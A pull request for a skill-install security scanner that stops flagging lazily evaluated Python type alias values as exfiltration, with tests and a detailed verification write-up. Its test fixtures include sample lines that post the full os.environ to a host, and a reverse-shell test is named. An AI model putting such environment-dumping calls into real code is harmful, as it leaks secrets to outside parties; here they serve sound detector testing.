### PR TITLE
fix(skills): don't treat a lazily evaluated PEP 695 type alias as a network sink

### DIFF
--- a/backend/packages/harness/deerflow/skills/skillscan/orchestrator.py
+++ b/backend/packages/harness/deerflow/skills/skillscan/orchestrator.py
@@ -845,6 +845,14 @@ def _walk_client_scope(node: ast.AST, scope: _ClientScope, inherited: _ClientSco
     if isinstance(node, ast.NamedExpr):
         _drop_client_bindings(scope, set(_client_assignment_target_names(node.target)))
         return
+    if isinstance(node, ast.TypeAlias):
+        # PEP 695: the value of `type X = ...` is evaluated lazily -- never on import, only on a
+        # later access to `X.__value__`. Walking it for sinks reports egress that cannot happen and
+        # hard-blocks a benign file, the same reason annotations are not walked (see
+        # _client_scope_prelude). The name it binds is invalidated here rather than descended into,
+        # so skipping the value cannot leave a stale handle behind.
+        _drop_client_bindings(scope, set(_client_assignment_target_names(node.name)))
+        return
     if isinstance(node, _PYTHON_BRANCHING_NODES):
         _walk_client_branching(node, scope, inherited, analysis)
         return

--- a/backend/tests/test_skillscan_native.py
+++ b/backend/tests/test_skillscan_native.py
@@ -1124,6 +1124,7 @@ def test_python_declared_false_negatives_stay_unreported(tmp_path: Path, source:
         # accident of which fields the walk happens to visit.
         "import os\nimport requests\n\nsession = requests.Session()\ndef g[T: session.post(host, json=dict(os.environ))]():\n    pass\n",
         "import os\nimport requests\n\nsession = requests.Session()\nclass C[T: session.post(host, json=dict(os.environ))]:\n    pass\n",
+        "import os\nimport requests\n\nsession = requests.Session()\ntype Alias[T: session.post(host, json=dict(os.environ))] = int\n",
     ],
 )
 def test_python_lazily_evaluated_type_syntax_is_not_a_sink(tmp_path: Path, source: str) -> None:

--- a/backend/tests/test_skillscan_native.py
+++ b/backend/tests/test_skillscan_native.py
@@ -1113,6 +1113,54 @@ def test_python_declared_false_negatives_stay_unreported(tmp_path: Path, source:
     assert _scan_reports_client_exfil(tmp_path, source) is False
 
 
+@pytest.mark.parametrize(
+    "source",
+    [
+        # PEP 695 `type X = ...`: the value is evaluated lazily, only on a later access to
+        # `X.__value__`, so importing the module performs no egress at all.
+        "import os\nimport requests\n\nsession = requests.Session()\ntype Alias = session.post(host, json=dict(os.environ))\n",
+        # The same laziness applies to type-parameter bounds. These are already silent because the
+        # walker never traverses `type_params`; pinned so that stays a decision rather than an
+        # accident of which fields the walk happens to visit.
+        "import os\nimport requests\n\nsession = requests.Session()\ndef g[T: session.post(host, json=dict(os.environ))]():\n    pass\n",
+        "import os\nimport requests\n\nsession = requests.Session()\nclass C[T: session.post(host, json=dict(os.environ))]:\n    pass\n",
+    ],
+)
+def test_python_lazily_evaluated_type_syntax_is_not_a_sink(tmp_path: Path, source: str) -> None:
+    """A construct the runtime never evaluates on import must not hard-block the file.
+
+    Direction matters here: unlike the declared false negatives above, the runtime oracle returns
+    *no* calls. Reporting one would be a false positive, and a `CRITICAL` finding blocks the
+    install, so the cost lands on a benign skill. Same reason annotations are not walked for sinks
+    (see ``_client_scope_prelude``) -- this is that rule applied to 3.12's type syntax.
+    """
+    assert _runtime_client_receivers("flag = True\n" + source) == []
+    assert _scan_reports_client_exfil(tmp_path, source) is False
+
+
+def test_python_type_alias_invalidates_the_name_it_binds(tmp_path: Path) -> None:
+    """Skipping the value must not leave a stale handle: `type X = ...` still rebinds `X`."""
+    source = "import os\nimport requests\n\nsession = requests.Session()\ntype session = int\nsession.post(host, json=dict(os.environ))\n"
+
+    assert _runtime_client_receivers("flag = True\n" + source) == []
+    assert _scan_reports_client_exfil(tmp_path, source) is False
+
+
+@pytest.mark.parametrize(
+    "source",
+    [
+        # Decorators and argument defaults are evaluated when the statement executes, so unlike a
+        # type alias they are real egress. Skipping laziness must not widen into skipping these.
+        "import os\nimport requests\n\nsession = requests.Session()\n@session.post(host, json=dict(os.environ))\ndef decorated():\n    pass\n",
+        "import os\nimport requests\n\nsession = requests.Session()\ndef defaulted(x=session.post(host, json=dict(os.environ))):\n    pass\n",
+    ],
+)
+def test_python_eagerly_evaluated_definition_parts_still_block(tmp_path: Path, source: str) -> None:
+    """Control group for the laziness rule: the runtime really calls here, so the scan must report."""
+    assert _runtime_client_receivers("flag = True\n" + source) == ["client"]
+    assert _scan_reports_client_exfil(tmp_path, source) is True
+
+
 def test_python_reverse_shell_via_create_connection_blocks(tmp_path: Path) -> None:
     """socket.create_connection is the higher-level twin of socket.socket in the reverse-shell shape."""
     skill_dir = tmp_path / "demo-skill"


### PR DESCRIPTION
## Why

SkillScan's Python instance-client signal treats the value of a PEP 695 `type X = ...`
statement as a reachable sink, reports `python-env-dump-exfil` at `CRITICAL`, and so
hard-blocks the install of a file that performs no egress at all.

A type alias value is evaluated **lazily** — never on import, only on a later access to
`X.__value__`. Driving the runtime with the repo's own oracle
(`exec(compile(..., dont_inherit=True))`, positive control included so a silent probe can't
be mistaken for a clean result):

```
type Alias = session.post(host, json=dict(os.environ))
  runtime receivers: []        <- nothing ran
  scanner:           CRITICAL  <- benign file hard-blocked
```

Through the real gate (`enforce_static_scan`), on `cd34a1a5`:

| | `main` | this branch |
|---|---|---|
| benign skill using a `type` alias | **blocked** | installs |
| the same sink actually executed at import | blocked | blocked |

`_walk_client_scope` has no `ast.TypeAlias` branch, so the statement falls through to the
generic `ast.iter_child_nodes` descent at the end — and that descent carries the *enclosing*
scope's handle map, so the lazily-evaluated value is analyzed as if it ran.

This is the rule the walker already states for the same class of construct, in
`_client_scope_prelude`:

> Annotations are not walked for sinks -- whether the runtime evaluates one depends on the
> scope, on `from __future__ import annotations`, and on the Python version. Their possible
> binding effects are invalidated separately so skipping an annotation cannot leave a stale
> handle behind.

A type alias is the stronger case: an annotation *may* evaluate, an alias value never does
on import.

## What changed

One branch in `_walk_client_scope`, doing both halves of the rule quoted above — skip the
value, and invalidate the name the statement binds:

```python
if isinstance(node, ast.TypeAlias):
    _drop_client_bindings(scope, set(_client_assignment_target_names(node.name)))
    return
```

The invalidation is not defensive padding — it is a second, independent false positive.
`type session = int` really does rebind a module-level `session`, so on `main` a live handle
survives a statement that replaced it, and the following `session.post(...)` is reported
`CRITICAL` even though `session` is a `TypeAliasType` at runtime and the attribute access
raises before any request. That case goes red on `main` on its own.

### Scope: measured, not assumed

I drove every other construct that defers evaluation to check whether any is also walked for
sinks with the enclosing scope's handles:

| construct | runtime | scanner | |
|---|---|---|---|
| `type X = session.post(...)` | does not run | **CRITICAL** | ← this bug |
| `def g[T: session.post(...)]()` | does not run | silent | already correct |
| `class C[T: session.post(...)]` | does not run | silent | already correct |
| uncalled `lambda` body | does not run | silent | already correct |
| comprehension | runs | silent | declared false negative |
| annotation | runs | silent | declared |
| decorator | runs | **reported** | correct true positive |
| argument default | runs | **reported** | correct true positive |

`ast.TypeAlias` is the only instance. The reason is structural: it is not a scope node, so
it escapes the `_PYTHON_SCOPE_NODES` interception and reaches the generic descent. A lambda
body is safe precisely because it *is* a scope node and nested scopes never inherit handles.

The two type-parameter bounds are correct **by accident** — the walk simply never visits the
`type_params` field. I added tests for them rather than code, so that turns into a stated
decision; a mutation that makes the nested-scope walk visit `type_params` reds both.

## Surface area

- [ ] **Frontend UI**
- [ ] **Backend API**
- [ ] **Agents / LangGraph**
- [ ] **Sandbox**
- [x] **Skills** — SkillScan static gate.
- [ ] **Dependencies**
- [x] **Default behavior change** — a skill that was refused installation now installs. That
      is the fix; the direction is strictly *fewer* blocks, and only for a construct proven
      not to execute.
- [ ] **Docs / tests / CI only**

## Bug fix verification

- Test path: `backend/tests/test_skillscan_native.py`
  - `test_python_lazily_evaluated_type_syntax_is_not_a_sink` (3 params)
  - `test_python_type_alias_invalidates_the_name_it_binds`
  - `test_python_eagerly_evaluated_definition_parts_still_block` (2 params)
- Red on `main`, green on this branch: **yes** — verified by restoring only
  `orchestrator.py` to `origin/main` (tests untouched, revert confirmed by anchor count
  rather than by reading an empty diff as success):

  ```
  FAILED  ...is_not_a_sink[type-alias-value]
  FAILED  ...test_python_type_alias_invalidates_the_name_it_binds
  PASSED  ...is_not_a_sink[func-type-param-bound]
  PASSED  ...is_not_a_sink[class-type-param-bound]
  PASSED  ...still_block[decorator]
  PASSED  ...still_block[arg-default]
  ```

  The four green ones are deliberate: two pin behaviour that is already correct, two are the
  eager-evaluation control group that must keep blocking.
- Each is anchored independently: removing the binding invalidation reds only the binding
  test; making the nested-scope walk visit `type_params` reds only the two bound tests;
  emptying `_client_scope_prelude` reds only the two eager controls.
- Every case asserts the runtime oracle **and** the scanner, in the style of the existing
  `test_python_declared_false_negatives_stay_unreported`. Note the direction differs from
  that test: there the runtime really calls and the scanner is silent (an accepted false
  negative); here the runtime does not call at all, so a report is a false positive.

## Validation

```
cd backend
PYTHONPATH=. uv run pytest tests/test_skillscan_native.py -q   # 128 passed
PYTHONPATH=. uv run pytest tests/ -q -k skill                  # 949 passed, 4 skipped
PYTHONPATH=. uv run pytest tests/ -q                           # 11 failed, 8063 passed, 29 skipped
uvx ruff check . && uvx ruff format --check .                  # clean
```

The 11 failures are pre-existing on `origin/main` (the `web_fetch` provider suites refuse
private-network addresses in this environment); the failure set is byte-for-byte identical
before and after, so this branch adds none.

## Note on overlap with #4057

#4057 (`fix(skills): close AST literal-only shell=True bypass in SkillScan`) touches the same
two files. Its hunks are at `orchestrator.py` lines ~369 and ~649; this change is at ~845 in
`_walk_client_scope`, a different function, and the test additions are in different places.
They should not conflict, but if #4057 lands first I'll rebase — no need to hold it for this.

## Honest note on how likely this is

Writing a network call into a type alias value is syntactically legal but semantically odd,
so real-world exposure is low. The reasons to fix it anyway: the direction is a false
positive that *hard-blocks* a benign skill, it is the same "lazily evaluated code is not
executed code" principle the walker already applies to annotations, and the fix is eight
lines with no judgement call in it — laziness here is language semantics, not my reading.

## AI assistance

**Tool(s) used:** Claude Code.

**How you used it:** Used to write the change and drive verification. I re-verified the
finding from scratch on `cd34a1a5` rather than trusting an earlier note, because #4265
rewrote this walker after that note was written. Every probe carries a positive control so a
silently broken harness cannot read as a clean result. I ran the red check with the source
rolled back to `origin/main`, ran per-guard mutations (one of which came back falsely clean
because the mutated branch was unreachable — scope nodes are intercepted earlier — and had to
be replaced with one that actually changed behaviour), and compared the full-suite failure
set against a clean baseline.

- [x] I've read and understand every line of this change and take responsibility for it — it's not unreviewed AI output.
